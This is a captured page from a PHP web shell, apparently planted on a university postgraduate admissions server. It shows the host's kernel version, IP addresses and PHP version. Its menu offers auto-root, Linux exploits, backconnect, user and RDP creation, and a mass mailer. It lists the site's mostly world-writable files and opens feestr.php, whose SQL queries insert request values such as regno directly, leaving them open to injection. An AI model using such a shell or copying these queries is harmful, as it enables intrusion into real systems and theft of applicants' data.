Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.171.72
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
pgetadm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pgetadm.php
3.61
KB
-rw-r--r--
PrintAdmissionOrderstudent.php
9.51
KB
-rwxrwxrwx
PrintAdmissionOrderstudent_ru....
11.26
KB
-rwxrwxrwx
acuapplicationFormPGReport.php
26.02
KB
-rwxr-xr-x
add-course.php
5.63
KB
-rwxrwxrwx
admissionorderPGReport.php
15.91
KB
-rwxrwxrwx
admissionordertest.php
356
B
-rwxrwxrwx
app-status.php
2.87
KB
-rwxrwxrwx
applicationFormPGReport.php
43.11
KB
-rwxrwxrwx
bcuapplicationFormPGReport.php
50.46
KB
-rwxrwxrwx
cancelSeat.php
4.51
KB
-rwxrwxrwx
casual-seat-allot.php
16.88
KB
-rwxrwxrwx
category.php
2.95
KB
-rwxrwxrwx
data.json
1.98
KB
-rwxrwxrwx
degree.php
11.73
KB
-rwxrwxrwx
feestr.php
5.7
KB
-rwxrwxrwx
forgot-password.php
2.77
KB
-rwxrwxrwx
generatestudentlistreport.php
11.34
KB
-rwxrwxrwx
getSavedData.php
13.67
KB
-rwxrwxrwx
getSavedData_old_12102019.php
5
KB
-rwxrwxrwx
hallticket.php
7.61
KB
-rwxrwxrwx
leaddetmail.php
2.09
KB
-rwxr-xr-x
login.php
1.21
KB
-rwxrwxrwx
logout.php
44
B
-rwxrwxrwx
option-entry-cr.php
4.76
KB
-rwxrwxrwx
option-entry.php
9.11
KB
-rwxrwxrwx
option-entryPrint.php
9.34
KB
-rwxrwxrwx
printadmissionorder.php
1.38
KB
-rwxrwxrwx
printhostelfeereport.php
11.84
KB
-rwxrwxrwx
report_ra_Notice_Boaed_Chart.p...
9.79
KB
-rwxrwxrwx
report_ra_invigilator_dairy.ph...
9.61
KB
-rwxrwxrwx
reportadm_admission_ticket.php
14.66
KB
-rwxrwxrwx
reprint.php
707
B
-rwxrwxrwx
resetpassword.php
783
B
-rwxrwxrwx
saveApplication.php
24.33
KB
-rwxrwxrwx
saveApplication_BACKUP_15072.p...
48.01
KB
-rwxrwxrwx
saveApplication_BASE_15072.php
23.61
KB
-rwxrwxrwx
saveApplication_LOCAL_15072.ph...
24.27
KB
-rwxrwxrwx
saveApplication_REMOTE_15072.p...
23.67
KB
-rwxrwxrwx
saveApplication_old_12102019.p...
14.67
KB
-rwxrwxrwx
seat-allot.php
9.18
KB
-rwxrwxrwx
seat_allotment_summary.php
8.42
KB
-rwxrwxrwx
sendGridMail.php
1.47
KB
-rwxrwxrwx
sendMobEmailOTP.php
1.41
KB
-rwxrwxrwx
sendsmsapi.php
760
B
-rwxrwxrwx
signin.php
1.24
KB
-rwxrwxrwx
signup.php
1.21
KB
-rwxrwxrwx
validateRegno.php
3.12
KB
-rwxrwxrwx
vkuapplicationFormPGReport cop...
36.61
KB
-rwxrwxrwx
vkuapplicationFormPGReport.php
24.17
KB
-rwxrwxrwx
vkuapplicationFormPGReportOld....
39.28
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : feestr.php
<?php function getFees($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $fcatcode = $aobj_context->mobj_data["fcatcode"]; $fdegree = $aobj_context->mobj_data["fdegree"]; $db = $aobj_context->mobj_data["db"]; $fee = 'F'; if($db == 'rcub' && (strtoupper($fdegree) == 'MSW' || strtoupper($fdegree) == 'MLIB')) { $fee ='T'; } $query = "select fheadcode,ifnull(frepfee,0) as frepfee, if('{$fee}' = 'T',ffee,fmaxfee) fmaxfee from admfeestr where fdegree ='PGET' and fcatcode = '{$fcatcode}' and fcombcode = 'PGET' and fexamno = 'A' and date_format(now(), '%Y-%m-%d') between fadmfeesdate and fadmfeeedate order by fheadcode"; $result1 = $aobj_context->mobj_db->GetAll($query); if(!$result1 && gettype($result1) == 'boolean'){ $arr['msg'] = "Error while fetching data"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } if(count($result1) > 0) { $arr['feestr'] = $result1; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } } function validateregno($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $regno = $aobj_context->mobj_data["regno"]; $query = "select a.fdegree, b.fdescpn, a.fcollcode, concat(cl.fcollname,', ', cl.ftown)as fcollname, a.fsubcode, a.fexamno, a.fmaxmarks, a.fsecmarks, co.funivname from control co, entvalmarks a inner join entprevdeg b on a.fdegree = b.fdegree inner join college cl on a.fcollcode = cl.fcollcode where fregno = '{$regno}' and fsubtype = 'T'"; $result1 = $aobj_context->mobj_db->GetAll($query); if(count($result1) == 0) { $arr['msg'] = "Data not found for the Reg. No."; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } $fdegree = $result1[0]['fdegree']; $fcollname = $result1[0]['fcollname']; $funivname = $result1[0]['funivname']; $tot_arr = array(); foreach($result1 as $k => $v) { $tot_arr['fsubcode'] = $v['fsubcode']; $tot_arr['f'.strtolower($v['fexamno']).'mm'] = $v['fmaxmarks']; $tot_arr['f'.strtolower($v['fexamno']).'mo'] = $v['fsecmarks']; } $query = "select b.fsubcode, b.fsubname, a.fexamno, a.fmaxmarks, a.fsecmarks from entvalmarks a inner join entprevcomb b on 'lan' = b.fdegree and a.fsubcode = b.fnewsub where fregno = '{$regno}' and fsubtype = 'L' order by fsubcode, fexamno"; $result1 = $aobj_context->mobj_db->GetAll($query); $lan_arr = array(); foreach($result1 as $k => $v) { $lan_arr[$v['fsubcode']]['fsubcode'] = $v['fsubcode']; $lan_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mm'] = $v['fmaxmarks']; $lan_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mo'] = $v['fsecmarks']; } $query = "select b.fsubcode, b.fsubname, a.fexamno, a.fmaxmarks, a.fsecmarks from entvalmarks a inner join entprevcomb b on a.fdegree = b.fdegree and a.fsubcode = b.fnewsub where a.fregno = '{$regno}' and a.fsubtype = 'O' order by a.fsubcode, a.fexamno"; $result1 = $aobj_context->mobj_db->GetAll($query); $opt_arr = array(); foreach($result1 as $k => $v) { $opt_arr[$v['fsubcode']]['fsubcode'] = $v['fsubcode']; $opt_arr[$v['fsubcode']]['fsubname'] = $v['fsubname']; $opt_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mm'] = $v['fmaxmarks']; $opt_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mo'] = $v['fsecmarks']; } if(!$result1 && gettype($result1) == 'boolean'){ $arr['msg'] = "Error while fetching data"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } if(count($result1) > 0) { $query = "select ifnull(fappno,'') as fappno, ifnull(ffinsub,'F') as ffinsub, ifnull(fpaystatus,'') as fpaystatus from entstudadm where fmobileno = '{$_SESSION['MOBILE']}'"; // var_dump($query); $result2 = $aobj_context->mobj_db->GetRow($query); $fappno = $result2['fappno']; $query = "select distinct fsubcode as int_code, fsubname as val from entprevcomb where fdegree = 'lan' and fcombcode = 'lan' order by fdescpn"; $result2 = $aobj_context->mobj_db->GetAll($query); $query = "select x.fdegree, y.fdescpn, if(ifnull(z.fdegree,'')='','','checked') as sddeg from (select distinct b.* from entvalmarks a, enteligdeg b where a.fdegree = b.fprevdeg and a.fsubcode = b.fnewsub and fregno = '{$regno}' union select distinct b.* from entvalmarks a, enteligdeg b where a.fdegree = b.fprevdeg and a.fsubcode = b.fsubcode and fregno = '{$regno}') x inner join entdeg y on x.fdegree = y.fdegree left join entoptdeg z on x.fdegree = z.fdegree and z.fappno = '{$fappno}' group by x.fdegree"; $result3 = $aobj_context->mobj_db->GetAll($query); $res = array( 'tot_arr' => $tot_arr, 'lan_arr' => $lan_arr, 'opt_arr' => $opt_arr, 'lansub' => $result2, 'degree' => $fdegree, 'college' => $fcollname, 'univname' =>$funivname, 'eligdeg' => $result3, 'combcode' => 'UNIV', 'combdesc' => 'University Marks' ); $arr['vkuprevdata'] = $res; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } }
Close